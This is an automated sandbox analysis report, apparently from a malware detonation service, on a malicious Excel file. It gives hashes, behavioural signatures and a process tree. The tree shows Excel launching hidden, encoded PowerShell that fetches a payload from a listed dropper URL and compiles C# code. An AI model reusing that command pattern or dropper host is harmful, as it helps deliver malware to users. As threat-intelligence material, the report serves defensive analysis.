Analysis

  • max time kernel
    46s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-11-2024 22:03

General

  • Target

    2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db.xls

  • Size

    46KB

  • MD5

    836c57d347726357d1e67ec4fee4960c

  • SHA1

    79b73aa267a84dcf5fe8cb9b7aad481428f4f5fe

  • SHA256

    2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db

  • SHA512

    edb98a134333a83be3ed49367ad2ea4e5d31c419e5b45840ffa2b804b9c7f2dfd9712ea98fd83831b253b6363f92f77fda7a740bff3aea3d68d1ddb01968b2ef

  • SSDEEP

    768:H4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc 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
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2500
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bqhw4gzd\bqhw4gzd.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:912
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0FE.tmp" "c:\Users\Admin\AppData\Local\Temp\bqhw4gzd\CSC4D44F08134B648A4AAA14BDC4AB6D268.TMP"
          4⤵
            PID:4864

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESC0FE.tmp

      Filesize

      1KB

      MD5

      d2d89aa56eba2d6bdb15dc3701e40bdc

      SHA1

      50fbc3374080d4a61097eeb99cbb49a9fd5f3f3b

      SHA256

      8346694fbc8921231e1ba8c26e9cf47e3fed8c0602fd591e74168af49cb792b0

      SHA512

      de600ff101e88e391bb9e10eaca553bc15489441811ffae90fd77face8187a015d8bb320a72885113938bf21ec72de41207a89b44e2f2e4940999cf8d83f5435

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3rltxhn.xdu.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\bqhw4gzd\bqhw4gzd.dll

      Filesize

      3KB

      MD5

      2425c5960111494a2419b6c3f7795f62

      SHA1

      5c344682f9e9456f1c8683c540c9831cdf8a30e3

      SHA256

      1efe4cae14c1e7ae92afe280d7f686e81a10b5ffa22caecb27ca0c1b6b9f68a6

      SHA512

      38756256f3efea68ca74291c56a599d42eb28ab66ccd8d7e07575dc8c555a7e9cf5cf0753812b080b7793509d9386f50cb6e730593c02d28a60a3625d18fe0bc

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      1KB

      MD5

      158c0dbe4a4cbfb42d5fa60cfbc3708c

      SHA1

      54510d52c559305577c2762043361145a3abbe93

      SHA256

      2422f9e6f57a2fbcbfbf9123be656f1f366e095c285abf3b36ecdb1e9ef5aba5

      SHA512

      fc7213b237ed610ef464d5a6e7d4a8941df823bb9407e4ea4ee7976b3e9f439e5bbd4fe842bd23009cb2b09f15acc3ab678b36a979e9a0098fb7a24e4a0d6f92

    • \??\c:\Users\Admin\AppData\Local\Temp\bqhw4gzd\CSC4D44F08134B648A4AAA14BDC4AB6D268.TMP

      Filesize

      652B

      MD5

      c2b406f88512c5d48b9ee233689ee843

      SHA1

      8f575c2bce35d3e6e9bda0c766fa28e981592d9a

      SHA256

      3b0bf100639b353b4cefa41307b20eae6b065edfa1de4dfd324138c962cd1645

      SHA512

      a97f266df9b8384b74acbc31bd0391f78e7569ff580cb9256ef9131876deaeace8046d7a851da9bdbbc6bdc6c964127a3fe27158ec1a34edb5baef6059c7593e

    • \??\c:\Users\Admin\AppData\Local\Temp\bqhw4gzd\bqhw4gzd.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\bqhw4gzd\bqhw4gzd.cmdline

      Filesize

      369B

      MD5

      7c7d569df8b9725f748cb0bd7e09884a

      SHA1

      78cfa6edfce6744acdce0c60783f48134a5e6bd0

      SHA256

      b570d1611784af4e92ae166dc6d756b80a7071cf50fee6cdcd2ee59955971be4

      SHA512

      e9d2b8151b2628515d3978b6cfd30f587fd0a846343ffbe083d9548fe7ab9313d7e0ad9f6800a5f115cfccaf6621d3d212514d1efb6e95927c24b6e142ace5d8

    • memory/464-5-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-14-0x00007FFF0BC30000-0x00007FFF0BCCE000-memory.dmp

      Filesize

      632KB

    • memory/464-7-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

      Filesize

      64KB

    • memory/464-6-0x00007FFECA190000-0x00007FFECA1A0000-memory.dmp

      Filesize

      64KB

    • memory/464-4-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-0-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-2-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-3-0x00007FFECC4B0000-0x00007FFECC4C0000-memory.dmp

      Filesize

      64KB

    • memory/464-48-0x00007FFF0BC30000-0x00007FFF0BCCE000-memory.dmp

      Filesize

      632KB

    • memory/464-1-0x00007FFF0BC30000-0x00007FFF0BCCE000-memory.dmp

      Filesize

      632KB

    • memory/2500-28-0x00000194B66F0000-0x00000194B6712000-memory.dmp

      Filesize

      136KB

    • memory/2500-44-0x00000194B66D0000-0x00000194B66D8000-memory.dmp

      Filesize

      32KB